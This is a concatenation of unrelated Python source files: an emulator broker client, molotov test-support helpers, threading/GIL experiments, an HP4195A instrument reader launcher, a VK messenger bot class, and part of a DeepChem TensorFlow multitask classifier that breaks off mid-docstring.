class RequestError(BrokerError):
"""Errors associated with failed HTTP requests subclass RequestError."""
pass
class RequestTimeoutError(RequestError):
pass
class RequestSocketError(RequestError):
"""A socket error. Check the errno field."""
def __init__(self, *args, **kwargs):
super(RequestSocketError, self).__init__(*args)
self.errno = None
def SocketConnResetErrno():
"""The errno value for a socket connection reset error."""
current_os = platforms.OperatingSystem.Current()
if current_os == platforms.OperatingSystem.WINDOWS:
return errno.WSAECONNRESET
return errno.ECONNRESET
def SocketConnRefusedErrno():
"""The errno value for a socket connection refused error."""
current_os = platforms.OperatingSystem.Current()
if current_os == platforms.OperatingSystem.WINDOWS:
return errno.WSAECONNREFUSED
return errno.ECONNREFUSED
def _Await(fn, timeout_secs):
"""Waits up to timeout_secs for fn() to return True."""
deadline = time.time() + timeout_secs
while time.time() < deadline:
if fn():
return True
time.sleep(0.2)
return False
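# Usage note: e.g. _Await(broker.IsRunning, 5) polls IsRunning() every 0.2s
# and returns False if it never became True within ~5 seconds.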
def _EmulatorPath(emulator_id=None, verb=None):
"""Builds a broker request path for operating on the specified emulator."""
path = '/v1/emulators'
if emulator_id:
path += '/' + urllib.quote(emulator_id)
if verb:
path += ':' + urllib.quote(verb)
return path
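# For reference, the paths this produces (illustrative emulator id):
#   _EmulatorPath()                     -> '/v1/emulators'
#   _EmulatorPath('datastore')          -> '/v1/emulators/datastore'
#   _EmulatorPath('datastore', 'start') -> '/v1/emulators/datastore:start'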
class Broker(object):
"""Broker manages a single instance of a broker process.
The broker process may be started through an instance of this class. An
already-running process can be manipulated through an instance of this class
as well.
"""
def __init__(self, address, config_file=None, broker_dir=None):
"""Constructor.
Args:
address: (str) The host or host-port of the broker server. The server may
already be running.
config_file: (str) The full path to the broker config file.
broker_dir: (str) A custom path to the broker directory.
"""
if config_file is not None:
assert os.path.isabs(config_file)
self._address = address
self._config_file = config_file
if broker_dir:
self._broker_dir = broker_dir
else:
self._broker_dir = os.path.join(util.GetCloudSDKRoot(), 'bin', 'broker')
self._host_port = arg_parsers.HostPort.Parse(address)
self._current_platform = platforms.Platform.Current()
self._process = None
self._comm_thread = None
def Start(self, redirect_output=False, logtostderr=False, wait_secs=10):
"""Starts the broker server, optionally with output redirection.
Args:
redirect_output: (bool) Whether to merge the stdout and stderr of the
broker server with the current process' output.
logtostderr: (bool) Whether the broker should log to stderr instead of
to a log file.
wait_secs: (float) The maximum time to wait for the broker to start
serving.
Raises:
BrokerError: If start failed.
"""
if self._process or self.IsRunning():
# Already started, possibly by another process.
return
args = [self._BrokerBinary()]
if self._host_port.host:
args.append('--host={0}'.format(self._host_port.host))
if self._host_port.port:
args.append('--port={0}'.format(self._host_port.port))
if self._config_file:
args.append('--config_file={0}'.format(self._config_file))
if logtostderr:
args.append('--logtostderr') # Disables file logging.
# The broker is run as a detached (daemon) process.
popen_args = self._current_platform.AsyncPopenArgs()
log.info('Starting broker: %r', args)
if redirect_output:
# Pipe the broker's output to our own, communicating on another thread
# to avoid blocking the current thread.
self._process = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**popen_args)
self._comm_thread = threading.Thread(target=self._process.communicate)
self._comm_thread.start()
else:
self._process = subprocess.Popen(args, **popen_args)
if not _Await(self.IsRunning, wait_secs):
log.warn('Broker did not start within {0}s'.format(wait_secs))
try:
# Clean up.
self.Shutdown()
except BrokerError:
pass
raise BrokerError('Broker failed to start')
log.info('Started broker: %s' % self._address)
def IsRunning(self):
"""Returns True iff the broker is known to be running."""
# We issue an RPC to check if the broker is running.
try:
response, _ = self._SendJsonRequest('GET', _EmulatorPath(),
timeout_secs=1.0)
return response.status == httplib.OK
except RequestError:
return False
def Shutdown(self, wait_secs=10):
"""Shuts down the broker server.
Args:
wait_secs: (float) The maximum time to wait for the broker to shutdown.
Raises:
BrokerError: If shutdown failed.
"""
if self._process:
try:
execution_utils.KillSubprocess(self._process)
self._process = None
if self._comm_thread:
self._comm_thread.join()
self._comm_thread = None
except RuntimeError as e:
log.warn('Failed to shutdown broker: %s' % e)
raise BrokerError('Broker failed to shutdown: %s' % e)
else:
# Invoke the /shutdown handler.
try:
self._SendJsonRequest('POST', '/shutdown')
except RequestSocketError as e:
if e.errno not in (SocketConnRefusedErrno(), SocketConnResetErrno()):
raise
# We may get an exception reading the response to the shutdown
# request, because the shutdown may preempt the response.
if not _Await(lambda: not self.IsRunning(), wait_secs):
log.warn('Failed to shutdown broker: still running after {0}s'.format(
wait_secs))
raise BrokerError('Broker failed to shutdown: timed-out')
log.info('Shutdown broker.')
def CreateEmulator(self,
emulator_id,
path,
args,
target_patterns,
resolved_host=None):
"""Creates a new emulator entry.
Args:
emulator_id: (str) The emulator id
path: (str) The path to the emulator binary.
args: (list of str) The command line arguments to the emulator.
target_patterns: (list or str) The regular expressions used to match
input targets for the emulator.
resolved_host: (str) The address to use when resolving the new emulator.
Only specified if the lifetime of this emulator is not managed by
this broker.
Raises:
BrokerNotRunningError: If the broker is not running.
BrokerError: If the creation failed.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to create emulator')
emulator = {
'emulator_id': emulator_id,
'start_command': {
'path': path,
'args': args,
},
'rule': {
'rule_id': emulator_id,
'target_patterns': target_patterns,
}
}
if resolved_host:
emulator['rule']['resolved_host'] = resolved_host
url = _EmulatorPath()
body = json.dumps(emulator)
response, data = self._SendJsonRequest('POST', url, body=body)
if response.status != httplib.OK:
log.warn('Failed to create emulator: {0} ({1})'.format(response.reason,
response.status))
raise BrokerError('Failed to create emulator: %s' % data)
def GetEmulator(self, emulator_id):
"""Returns emulator entry (Json dict).
Args:
emulator_id: (str) The id of the emulator to get.
Returns:
A Json dict representation of a google.emulators.Emulator proto message.
Raises:
BrokerNotRunningError: If the broker is not running.
BrokerError: If the get failed.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to get emulator: %s' % emulator_id)
response, data = self._SendJsonRequest('GET', _EmulatorPath(emulator_id))
if response.status != httplib.OK:
raise BrokerError('Failed to get emulator: %s' % data)
return json.loads(data)
def ListEmulators(self):
"""Returns the list of emulators, or None.
Returns:
A list of Json dicts representing google.emulators.Emulator proto
messages, or None if the list operation fails.
Raises:
BrokerNotRunningError: If the broker is not running.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to list emulators')
try:
response, data = self._SendJsonRequest('GET', _EmulatorPath())
if response.status != httplib.OK:
log.warn('Failed to list emulators: {0} ({1})'.format(response.reason,
response.status))
return
except RequestError:
return
list_response = json.loads(data)
try:
return list_response['emulators']
except KeyError:
# The expected values were not present.
return
def StartEmulator(self, emulator_id):
"""Starts the specified emulator via the broker, which must be running.
Args:
emulator_id: (str) The id of the emulator to start.
Raises:
BrokerNotRunningError: If the broker is not running.
BrokerError: If the emulator could not be started for another reason.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to start emulator: %s' % emulator_id)
url = _EmulatorPath(emulator_id, verb='start')
response, data = self._SendJsonRequest('POST', url)
if response.status != httplib.OK:
log.warn('Failed to start emulator {0}: {1} ({2})'.format(
emulator_id, response.reason, response.status))
raise BrokerError('Failed to start emulator: %s' % data)
def StopEmulator(self, emulator_id):
"""Stops the specified emulator via the broker, which must be running.
Args:
emulator_id: (str) The id of the emulator to stop.
Raises:
BrokerNotRunningError: If the broker is not running.
BrokerError: If the emulator could not be stopped for another reason.
"""
if not self.IsRunning():
raise BrokerNotRunningError('Failed to stop emulator: %s' % emulator_id)
url = _EmulatorPath(emulator_id, verb='stop')
response, data = self._SendJsonRequest('POST', url)
if response.status != httplib.OK:
log.warn('Failed to stop emulator {0}: {1} ({2})'.format(
emulator_id, response.reason, response.status))
raise BrokerError('Failed to stop emulator: %s' % data)
def _BrokerBinary(self):
"""Returns the path to the broker binary."""
return '{0}/broker'.format(self._broker_dir)
def _SendJsonRequest(self, method, path, body=None, timeout_secs=300):
"""Sends a request to the broker.
Args:
method: (str) The HTTP method.
path: (str) The URI path.
body: (str) The request body.
timeout_secs: (float) The request timeout, in seconds.
Returns:
(httplib2.Response, str): the HTTP response object and the response body.
Raises:
RequestTimeoutError: The request timed-out.
RequestSocketError: The request failed due to a socket error.
RequestError: The request errored out in some other way.
"""
uri = 'http://{0}{1}'.format(self._address, path)
http_client = httplib2.Http(timeout=timeout_secs)
try:
return http_client.request(
uri=uri,
method=method,
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=body)
except socket.error as e:
if isinstance(e, socket.timeout):
raise RequestTimeoutError(e)
error = RequestSocketError(e)
if e.errno:
error.errno = e.errno
raise error
except httplib.HTTPException as e:
if isinstance(e, httplib.ResponseNotReady):
raise RequestTimeoutError(e)
raise RequestError(e)
except httplib2.HttpLib2Error as e:
raise RequestError(e)
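# A typical lifecycle with this module, as a sketch (the address, emulator id,
# binary path, and patterns below are made-up example values):
#
#   broker = Broker('localhost:8100')
#   broker.Start(logtostderr=True)
#   broker.CreateEmulator('my-emulator', '/path/to/emulator-binary',
#                         args=['--port=9000'], target_patterns=['.*'])
#   broker.StartEmulator('my-emulator')
#   # ... use the emulator ...
#   broker.StopEmulator('my-emulator')
#   broker.Shutdown()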
|
support.py | import sys
import signal
import os
import asyncio
import unittest
import time
from contextlib import contextmanager
import functools
from collections import namedtuple
from http.client import HTTPConnection
from io import StringIO
import http.server
import socketserver
import pytest
from queue import Empty
from unittest.mock import patch
from aiohttp.client_reqrep import URL
from multidict import CIMultiDict
from molotov.api import _SCENARIO, _FIXTURES
from molotov import util
from molotov.run import PYPY
from molotov.session import LoggedClientRequest, LoggedClientResponse
from molotov.sharedconsole import SharedConsole
from molotov.sharedcounter import SharedCounters
HERE = os.path.dirname(__file__)
skip_pypy = pytest.mark.skipif(PYPY, reason="could not make work on pypy")
only_pypy = pytest.mark.skipif(not PYPY, reason="only pypy")
if os.environ.get("HAS_JOSH_K_SEAL_OF_APPROVAL", False):
_TIMEOUT = 1.0
else:
_TIMEOUT = 0.2
async def serialize(console):
res = []
while True:
try:
res.append(console._stream.get(block=True, timeout=_TIMEOUT))
except Empty:
break
return "".join(res)
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/redirect":
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
return
if self.path == "/slow":
try:
time.sleep(5)
self.send_response(200)
self.end_headers()
except SystemExit:
pass
return
return super(RequestHandler, self).do_GET()
def do_POST(self):
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length)
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write(body)
def _run(port):
os.chdir(HERE)
socketserver.TCPServer.allow_reuse_address = True
attempts = 0
httpd = None
error = None
while attempts < 3:
try:
httpd = socketserver.TCPServer(("", port), RequestHandler)
break
except Exception as e:
error = e
attempts += 1
time.sleep(0.1)
if httpd is None:
raise OSError("Could not start the coserver: %s" % str(error))
def _shutdown(*args, **kw):
httpd.server_close()
sys.exit(0)
signal.signal(signal.SIGTERM, _shutdown)
signal.signal(signal.SIGINT, _shutdown)
httpd.serve_forever()
def run_server(port=8888):
"""Running in a subprocess to avoid any interference
"""
p = util.multiprocessing.Process(target=functools.partial(_run, port))
p.start()
start = time.time()
connected = False
while time.time() - start < 5 and not connected:
try:
conn = HTTPConnection("localhost", port)
conn.request("GET", "/")
conn.getresponse()
connected = True
except Exception:
time.sleep(0.1)
if not connected:
os.kill(p.pid, signal.SIGTERM)
p.join(timeout=1.0)
raise OSError("Could not connect to coserver")
return p
_CO = {"clients": 0, "server": None}
@contextmanager
def coserver(port=8888):
if _CO["clients"] == 0:
_CO["server"] = run_server(port)
_CO["clients"] += 1
try:
yield
finally:
_CO["clients"] -= 1
if _CO["clients"] == 0:
os.kill(_CO["server"].pid, signal.SIGTERM)
_CO["server"].join(timeout=1.0)
_CO["server"].terminate()
_CO["server"] = None
def _respkw():
from aiohttp.helpers import TimerNoop
return {
"request_info": None,
"writer": None,
"continue100": None,
"timer": TimerNoop(),
"traces": [],
"loop": asyncio.get_event_loop(),
"session": None,
}
def Response(method="GET", status=200, body=b"***"):
response = LoggedClientResponse(method, URL("/"), **_respkw())
response.status = status
response.reason = ""
response.code = status
response.should_close = False
response._headers = CIMultiDict({})
response._raw_headers = []
class Body:
async def read(self):
return body
def feed_data(self, data):
if body == b"":
err = AttributeError(
"'EmptyStreamReader' object has no " "attribute 'unread_data'"
)
raise err
pass
response.content = Body()
response._content = body
return response
def Request(url="http://127.0.0.1/", method="GET", body=b"***", loop=None):
if loop is None:
loop = asyncio.get_event_loop()
request = LoggedClientRequest(method, URL(url), loop=loop)
request.body = body
return request
class TestLoop(unittest.TestCase):
def setUp(self):
self.old = dict(_SCENARIO)
self.oldsetup = dict(_FIXTURES)
util._STOP = False
util._STOP_WHY = []
util._TIMER = None
self.policy = asyncio.get_event_loop_policy()
_SCENARIO.clear()
_FIXTURES.clear()
def tearDown(self):
_SCENARIO.clear()
_FIXTURES.clear()
_FIXTURES.update(self.oldsetup)
asyncio.set_event_loop_policy(self.policy)
def get_args(self, console=None):
args = namedtuple("args", "verbose quiet duration exception")
args.force_shutdown = False
args.ramp_up = 0.0
args.verbose = 1
args.quiet = False
args.duration = 0.2
args.exception = True
args.processes = 1
args.debug = True
args.workers = 1
args.console = True
args.statsd = False
args.single_mode = None
args.single_run = False
args.max_runs = None
args.delay = 0.0
args.sizing = False
args.sizing_tolerance = 0.0
args.console_update = 0
args.use_extension = []
args.fail = None
args.force_reconnection = False
args.disable_dns_resolve = False
if console is None:
console = SharedConsole(interval=0)
args.shared_console = console
return args
def async_test(func):
@functools.wraps(func)
def _async_test(*args, **kw):
oldloop = asyncio.get_event_loop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.set_debug(True)
console = SharedConsole(interval=0)
results = SharedCounters(
"WORKER",
"REACHED",
"RATIO",
"OK",
"FAILED",
"MINUTE_OK",
"MINUTE_FAILED",
"MAX_WORKERS",
"SETUP_FAILED",
"SESSION_SETUP_FAILED",
)
kw["loop"] = loop
kw["console"] = console
kw["results"] = results
fut = asyncio.ensure_future(func(*args, **kw))
try:
loop.run_until_complete(fut)
finally:
loop.stop()
loop.close()
asyncio.set_event_loop(oldloop)
return fut.result()
return _async_test
def dedicatedloop(func):
@functools.wraps(func)
def _loop(*args, **kw):
old_loop = asyncio.get_event_loop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
return func(*args, **kw)
finally:
if not loop.is_closed():
loop.stop()
loop.close()
asyncio.set_event_loop(old_loop)
return _loop
def dedicatedloop_noclose(func):
@functools.wraps(func)
def _loop(*args, **kw):
old_loop = asyncio.get_event_loop()
loop = asyncio.new_event_loop()
loop.set_debug(True)
loop._close = loop.close
loop.close = lambda: None
asyncio.set_event_loop(loop)
try:
return func(*args, **kw)
finally:
loop._close()
asyncio.set_event_loop(old_loop)
return _loop
@contextmanager
def catch_output():
oldout, olderr = sys.stdout, sys.stderr
sys.stdout, sys.stderr = StringIO(), StringIO()
try:
yield sys.stdout, sys.stderr
finally:
sys.stdout.seek(0)
sys.stderr.seek(0)
sys.stdout, sys.stderr = oldout, olderr
@contextmanager
def set_args(*args):
old = list(sys.argv)
sys.argv[:] = args
oldout, olderr = sys.stdout, sys.stderr
sys.stdout, sys.stderr = StringIO(), StringIO()
try:
yield sys.stdout, sys.stderr
finally:
sys.stdout.seek(0)
sys.stderr.seek(0)
sys.argv[:] = old
sys.stdout, sys.stderr = oldout, olderr
@contextmanager
def catch_sleep(calls=None):
original = asyncio.sleep
if calls is None:
calls = []
async def _slept(delay, result=None, *, loop=None):
# 86400 is the duration timer
if delay not in (0, 86400):
calls.append(delay)
# forces a context switch
await original(0)
with patch("asyncio.sleep", _slept):
yield calls
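# Usage sketch for catch_sleep(): inside the block asyncio.sleep() is patched
# so requested delays are recorded rather than awaited (0 and the 86400
# duration timer are filtered out):
#
#   async def pause():
#       await asyncio.sleep(1.5)
#
#   with catch_sleep() as calls:
#       asyncio.new_event_loop().run_until_complete(pause())
#   assert calls == [1.5]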
|
test_threading_GIL.py | import os
import threading
import time
import random
from collections import namedtuple
def cpu_task():
i = 60000000
for _ in range(i):
1+1
def sleep_task():
time.sleep(1)
def func_time(callable):
init = time.time()
callable()
end = time.time()
print(end - init)
if 0:
def p_entry1():
i = 10000000
def rest():
for _ in range(i):
1+1
for order in range(30):
print('', order)
rest()
def p_entry2():
i = 10000000
def rest():
for _ in range(i):
1+1
for order in range(30):
print(' ', order)
rest()
def p_entry3():
i = 10000000
def rest():
for _ in range(i):
1+1
for order in range(30):
print(' ', order)
rest()
T1 = threading.Thread(target = p_entry1)
T2 = threading.Thread(target = p_entry2)
T3 = threading.Thread(target = p_entry3)
T1.start()
T2.start()
T3.start()
T1.join()
T2.join()
T3.join()
if 0:
func_time(cpu_task)
func_time(sleep_task)
if 0:
def cpu_task_long():
for _ in range(1000000000): # 16.4
1+1
print('cpu done')
def sleep_task_long():
time.sleep(16.4)
print('sleep done')
def cpu_thread_entry():
cpu_task_long()
def sleep_thread_entry():
sleep_task_long()
T1 = threading.Thread(target = cpu_thread_entry)
#T2 = threading.Thread(target = sleep_thread_entry)
T1.start()
#T2.start()
#cpu_task_long()
sleep_task_long()
T1.join()
#T2.join()
if 0:
cycle = 30
count = 0
print(count)
def cpu_thread_entry():
for _ in range(cycle):
cpu_task()
print('cpu done')
def sleep_thread_entry():
for _ in range(cycle):
sleep_task()
print('sleep done')
T1 = threading.Thread(target = cpu_thread_entry)
T2 = threading.Thread(target = sleep_thread_entry)
init = time.time()
T1.start()
T2.start()
T1.join()
T2.join()
end = time.time()
print('cpu + sleep', end - init, 'seconds')
if 0:
cycle = 30
count = 0
print(count)
def cpu_thread_entry():
for _ in range(cycle):
cpu_task()
print('cpu done')
def sleep_thread_entry():
for _ in range(cycle):
sleep_task()
print('sleep done')
T1 = threading.Thread(target = cpu_thread_entry)
T2 = threading.Thread(target = cpu_thread_entry)
init = time.time()
T1.start()
T2.start()
T1.join()
T2.join()
end = time.time()
print('cpu + cpu', end - init, 'seconds')
if 0:
cycle = 30
count = 0
print(count)
def cpu_thread_entry():
for _ in range(cycle):
cpu_task()
print('cpu done')
def sleep_thread_entry():
for _ in range(cycle):
sleep_task()
print('sleep done')
T1 = threading.Thread(target = sleep_thread_entry)
T2 = threading.Thread(target = sleep_thread_entry)
init = time.time()
T1.start()
T2.start()
T1.join()
T2.join()
end = time.time()
print('sleep + sleep', end - init, 'seconds')
#note: the GIL does not make "global_count += 1" atomic, so the interleaved
#read-modify-write below can still lose increments
if 0:
global_count = 0
def increase1():
global global_count
for _ in range(50):
global_count += 1
print(global_count)
def increase2():
global global_count
for _ in range(50,100,1):
global_count += 1
print(' ', global_count)
T1 = threading.Thread(target = increase1)
T2 = threading.Thread(target = increase2)
T1.start()
T2.start()
T1.join()
T2.join()
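#Fix sketch for the race above: serialize the read-modify-write with a lock
#(same shape as the block above; with the lock the final count is always 100)
if 0:
    global_count = 0
    count_lock = threading.Lock()
    def safe_increase():
        global global_count
        for _ in range(50):
            with count_lock:  # makes "global_count += 1" effectively atomic
                global_count += 1
    T1 = threading.Thread(target = safe_increase)
    T2 = threading.Thread(target = safe_increase)
    T1.start()
    T2.start()
    T1.join()
    T2.join()
    print(global_count)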
#Question: is sync() guaranteed to copy one consistent value of self.rand,
#given that interrupt() mutates it concurrently?
if 1:
class RandChecker:
def __init__(self):
self.rand = random.random()
self.checker_list = [0] * 500
def sync(self):
for i in range(500):
self.checker_list[i] = self.rand
print(1)
def test_sync(self):
pivot = self.checker_list[0]
for i in range(500):
if self.checker_list[i] != pivot:
print('Error!!')
return
print('Success')
return
def interrupt(self):
for _ in range(30):
self.rand = random.random()
print(111111)
a = RandChecker()
T1 = threading.Thread(target = a.sync)
T2 = threading.Thread(target = a.interrupt)
T1.start()
T2.start()
T1.join()
T2.join()
a.test_sync() |
hp4195a_reader.py | import sys
import os
import threading
import logging.config
import hp4195a as hp
import multi_logging as ml
from multiprocessing import Queue, freeze_support
from main_window import MainWindow
from PyQt5 import QtWidgets
if __name__ == '__main__':
freeze_support()
command_queue = Queue()
message_queue = Queue()
data_queue = Queue()
logging_queue = Queue()
dp = hp.hp4195a(command_queue, message_queue, data_queue, logging_queue)
dp.daemon = True
dp.start()
app = QtWidgets.QApplication(sys.argv)
gp = MainWindow(command_queue, message_queue, data_queue, logging_queue)
if getattr(sys, 'frozen', False):
dir_name = os.path.dirname(sys.executable)
else:
dir_name = os.path.dirname(__file__)
log_file_path = os.path.join(dir_name, 'logging.conf')
logging.config.fileConfig(log_file_path, disable_existing_loggers=False)
lp = threading.Thread(target=ml.logger_thread, args=(logging_queue,))
lp.daemon = True
lp.start()
exit_code = app.exec_()
dp.join()
logging_queue.put(None)
lp.join()
sys.exit(exit_code)
|
release.py | import sys
import datetime
import time
from threading import Thread
from vk_api.bot_longpoll import VkBotEventType
from vk_api.utils import get_random_id
from vk_api.keyboard import VkKeyboard
from core.utils import BaseStarter, LoginManagerMixin, APIBackendMixin, KeyboardMixin, FileDB, BotLogger
class VkBot(BaseStarter):
"""
A class that has collected all the basic elements for creating a fully functional bot
(Launching, working with an account, working with an external API, working with a keyboard).
Implemented basic commands needed in most bots
"""
logger = BotLogger().get_logger()
def __init__(self, system_name: str = '[Automatic notification]', *args, **kwargs):
self.system_name = system_name
self.standart_msg_block = ''
self.api = APIBackendMixin()
self.keyboard = KeyboardMixin()
self.user = LoginManagerMixin()
if kwargs.get('logger'):
self.logger = kwargs.get('logger')
super().__init__(*args, **kwargs)
@logger.catch
def send_msg(self, send_id: int, message: str, keyboard: VkKeyboard = None) -> None:
""" Sending a message """
if keyboard:
self._vk_api.messages.send(peer_id=send_id,
message=message,
random_id=get_random_id(),
keyboard=keyboard.get_keyboard())
else:
self._vk_api.messages.send(peer_id=send_id,
message=message,
random_id=get_random_id())
@logger.catch
def get_user_name(self, user_id: int) -> str:
""" Getting the username """
return self._vk_api.users.get(user_id=user_id)[0]['first_name']
@logger.catch
def get_user_last_name(self, user_id: int) -> str:
""" Get the user's last name """
return self._vk_api.users.get(user_id=user_id)[0]['last_name']
@logger.catch
def get_full_name(self, send_id: int) -> str:
return '{} {}'.format(self.get_user_name(send_id), self.get_user_last_name(send_id))
@logger.catch
def get_user_closed(self, send_id: int) -> None:
print(self._vk_api.users.get(user_id=send_id)[0]['is_closed'])
@logger.catch
def get_bot_info(self, *args, **kwargs):
time_format = str(datetime.timedelta(seconds=time.time()-self.__start_time))
bot_info = 'Bot uptime: {}.\nCommands executed: {}'.format(time_format, self.__executed_commands)
print(bot_info)
@logger.catch
def send_admin_msg(self, msg):
for admin in self.admins:
self.send_msg(admin, message=msg)
@logger.catch
def command_help(self, send_id: int) -> None:
message = ''
for command in self.commands:
command_not_param = command.split(' *')[0]
if not command.count('*nshow'):
if command.count('*admin'):
if send_id in self.admins:
message += f"{command_not_param}: {self.commands[command]['comment']} ๐\n\n"
else:
message += command_not_param + ': ' + self.commands[command]['comment'] + '\n\n'
self.send_msg(send_id, message=message, keyboard=self.keyboard.get_standart_keyboard())
@logger.catch
def command_msg(self, send_id: int):
text_in_msg = self._text_in_msg.replace(self._command_args, '')
user_id = text_in_msg.split()[1]
msg = ' '.join(text_in_msg.split()[2:])
username = FileDB().get_by_value(value=user_id, index=0)
username = username[0][1]
self.send_msg(user_id,
message=f'{self.system_name}{msg}',
)
self.send_msg(send_id,
message=f'Message to user {username} was sent successfully!',
)
@logger.catch
def command_killbot(self, send_id: int):
if send_id in self.admins:
login = self.user.authenticate(str(send_id))[1]
self.send_admin_msg(f'The bot was stopped by administrator {login}!')
sys.exit()
@logger.catch
def start(self, commands: dict, debug: bool = None, multithread: bool = True) -> None:
""" ะะฐะฟััะบ ะฑะพัะฐ """
print('ะฏ ะทะฐะฟััะตะฝ!')
self.__start_time = time.time()
self.__executed_commands = 0
if (self.debug != debug) and (debug is not None):
self.debug = debug
self.commands = commands
for event in self._long_poll.listen(): # listen to the long-poll server
# a new message has arrived
if event.type == VkBotEventType.MESSAGE_NEW:
send_id = event.object.peer_id
if self.debug and send_id in self.admins:
if multithread:
thread = Thread(target=self._command_starter, args=[event])
thread.start()
else:
self._command_starter(event=event)
self.__executed_commands += 1
else:
try:
if multithread:
thread = Thread(target=self._command_starter, args=[event])
thread.start()
else:
self._command_starter(event=event)
self.__executed_commands += 1
except Exception as exc:
text_message = event.object.text
username = '\nUser name: {}\nMessage text: {}'.format(self.get_full_name(send_id),
text_message)
self.__error_handler(exc=exc, any=username)
self.send_msg(send_id,
message='A server error occurred.\nThe administrators have already been notified; we apologize for the inconvenience.',
keyboard=self.keyboard.get_standart_keyboard())
@logger.catch
def get_command_text(self, command, command_args):
return ''.join(list(command.replace(command_args, ''))[1:]).lstrip()
@logger.catch
def __error_handler(self, exc, any: str = ''):
self.send_admin_msg(f'An error occurred: {exc}\n{any}')
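# Wiring sketch: start() takes a dict mapping command strings to descriptors.
# Judging from command_help(), a key may carry a ' *admin' (admin-only) or
# ' *nshow' (hidden) suffix and the value holds at least a 'comment' entry;
# any handler field lives in BaseStarter and is not shown in this file.
#
#   bot = VkBot()
#   commands = {
#       'help': {'comment': 'list available commands'},
#       'killbot *admin': {'comment': 'stop the bot'},
#   }
#   bot.start(commands, multithread=True)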
|
fcnet.py | """TensorFlow implementation of fully connected networks.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import warnings
import time
import numpy as np
import tensorflow as tf
import threading
import collections
import deepchem as dc
from deepchem.nn import model_ops
from deepchem.utils.save import log
from deepchem.metrics import to_one_hot, from_one_hot
from deepchem.models.tensorflow_models import TensorflowGraph
from deepchem.models.tensorflow_models import TensorflowGraphModel
from deepchem.models.tensorflow_models import TensorflowClassifier
from deepchem.models.tensorflow_models import TensorflowRegressor
from deepchem.metrics import to_one_hot
from deepchem.models.tensorgraph.tensor_graph import TensorGraph, TFWrapper
from deepchem.models.tensorgraph.layers import Feature, Label, Weights, WeightedError, Dense, Dropout, WeightDecay, Reshape, SoftMaxCrossEntropy, L2Loss
class TensorGraphMultiTaskClassifier(TensorGraph):
def __init__(self,
n_tasks,
n_features,
layer_sizes=[1000],
weight_init_stddevs=0.02,
bias_init_consts=1.0,
weight_decay_penalty=0.0,
weight_decay_penalty_type="l2",
dropouts=0.5,
activation_fns=tf.nn.relu,
n_classes=2,
**kwargs):
"""Create a TensorGraphMultiTaskClassifier.
In addition to the following arguments, this class also accepts all the keyword arguments
from TensorGraph.
Parameters
----------
n_tasks: int
number of tasks
n_features: int
number of features
layer_sizes: list
the size of each dense layer in the network. The length of this list determines the number of layers.
weight_init_stddevs: list or float
the standard deviation of the distribution to use for weight initialization of each layer. The length
of this list should equal len(layer_sizes). Alternatively this may be a single value instead of a list,
in which case the same value is used for every layer.
bias_init_consts: list or float
the value to initialize the biases in each layer to. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
weight_decay_penalty: float
the magnitude of the weight decay penalty to use
weight_decay_penalty_type: str
the type of penalty to use for weight decay, either 'l1' or 'l2'
dropouts: list or float
the dropout probability to use for each layer. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
activation_fns: list or object
the Tensorflow activation function to apply to each layer. The length of this list should equal
len(layer_sizes). Alternatively this may be a single value instead of a list, in which case the
same value is used for every layer.
n_classes: int
the number of classes
"""
super(TensorGraphMultiTaskClassifier, self).__init__(**kwargs)
self.n_tasks = n_tasks
self.n_features = n_features
self.n_classes = n_classes
n_layers = len(layer_sizes)
if not isinstance(weight_init_stddevs, collections.Sequence):
weight_init_stddevs = [weight_init_stddevs] * n_layers
if not isinstance(bias_init_consts, collections.Sequence):
bias_init_consts = [bias_init_consts] * n_layers
if not isinstance(dropouts, collections.Sequence):
dropouts = [dropouts] * n_layers
if not isinstance(activation_fns, collections.Sequence):
activation_fns = [activation_fns] * n_layers
# Add the input features.
mol_features = Feature(shape=(None, n_features))
prev_layer = mol_features
# Add the dense layers
for size, weight_stddev, bias_const, dropout, activation_fn in zip(
layer_sizes, weight_init_stddevs, bias_init_consts, dropouts,
activation_fns):
layer = Dense(
in_layers=[prev_layer],
out_channels=size,
activation_fn=activation_fn,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer, stddev=weight_stddev),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_const))
if dropout > 0.0:
layer = Dropout(dropout, in_layers=[layer])
prev_layer = layer
# Compute the loss function for each label.
output = Reshape(
shape=(-1, n_tasks, n_classes),
in_layers=[
Dense(in_layers=[prev_layer], out_channels=n_tasks * n_classes)
])
self.add_output(output)
labels = Label(shape=(None, n_tasks, n_classes))
weights = Weights(shape=(None, n_tasks))
loss = SoftMaxCrossEntropy(in_layers=[labels, output])
weighted_loss = WeightedError(in_layers=[loss, weights])
if weight_decay_penalty != 0.0:
weighted_loss = WeightDecay(
weight_decay_penalty,
weight_decay_penalty_type,
in_layers=[weighted_loss])
self.set_loss(weighted_loss)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = to_one_hot(y_b.flatten(),
self.n_classes).reshape(
-1, self.n_tasks,
self.n_classes)
if X_b is not None:
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
def predict_proba(self, dataset, transformers=[], outputs=None):
return super(TensorGraphMultiTaskClassifier, self).predict(
dataset, transformers, outputs)
def predict(self, dataset, transformers=[], outputs=None):
"""
Uses self to make predictions on provided Dataset object.
Parameters
----------
